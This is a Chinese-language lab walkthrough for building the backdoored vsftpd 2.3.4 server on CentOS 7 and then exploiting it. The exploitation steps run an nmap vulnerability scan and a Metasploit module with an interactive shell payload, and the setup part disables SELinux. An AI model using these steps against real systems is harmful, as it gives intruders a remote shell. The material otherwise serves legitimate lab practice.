一、centos7搭建过程
下载地址:GitHub - shurongyugong/shurong.github.io at ftp2.3.4(笑脸漏洞)
-
解压文件
tar -zxvf 压缩包 cd vsftpd-2.3.4 chmod 777 *
-
安装编译所需依赖
#遇到"/usr/bin/ld: 找不到 -lcap"错误,安装 libcap 库及其开发工具 yum install libcap libcap-devel -y #检查依赖关系,这将确保安装了构建和编译工具。 yum groupinstall "Development Tools" -y
-
进行编译安装,出现以下这些东西,说明安装成功。
make &&make install
-
然后执行下面步骤
cp vsftpd.conf /etc #配置主文件 cp RedHat/vsftpd.pam /etc/pam.d/ftp #PAM 认证
-
修改配置文件
vim /etc/vsftpd.conf 将listen改为yes 将local_enable改为YES
-
修改
/etc/xinetd.d/vsftpd
vim /etc/xinetd.d/vsftpd 保证disable是yes
-
关闭
selinux
,打开配置文件把这里修改为disabled
。vim /etc/selinux/config
-
启动
vsftp
/usr/local/sbin/vsftpd &
-
ps -eaf|grep vsftp
查看是否启动,出现两个vsftpd
即为正常。 -
接下来可以做一下
vsftp
的自启动 -
首先先创建
/etc/systemd/system/ftp.service
文件[Unit] Description=/etc/rc.local Compatibility ConditionPathExists=/etc/rc.local [Service] Type=forking ExecStart=/etc/rc.local start TimeoutSec=0 StandardOutput=tty RemainAfterExit=yes SysVStartPriority=99 [Install] WantedBy=multi-user.target
-
如果没有
rc.1oca1
文件,就需要自己创建在etc
目录下,并赋予执行权限chmod +x /etc/rc.Tocal
#!/bin/bash # THIS FILE IS ADDED FOR COMPATIBILITY PURPOSES # # It is highly advisable to create own systemd services or udev rules # to run scripts during boot instead of using this file. # # In contrast to previous versions due to parallel execution during boot # this script will NOT be run after all other services. # # Please note that you must run 'chmod +x /etc/rc.d/rc.local' to ensure # that this script will be executed during boot. /usr/local/sbin/vsftpd &
-
-
启动并设置自启
ftp.service
sudo systemctl start ftp.service sudo systemctl enable ftp.service
二、复现过程
-
扫描目标ip,查看是否存在漏洞,出现以下这些就代表存在。
nmap -script=vuln -p 21 目标IP
-
打开
msf
,搜索对应攻击模块search vsftp use 0
-
设置
ip
和payload
set rhosts 目标机IP show payloads set payload payload/cmd/unix/interact exploit
-
执行成功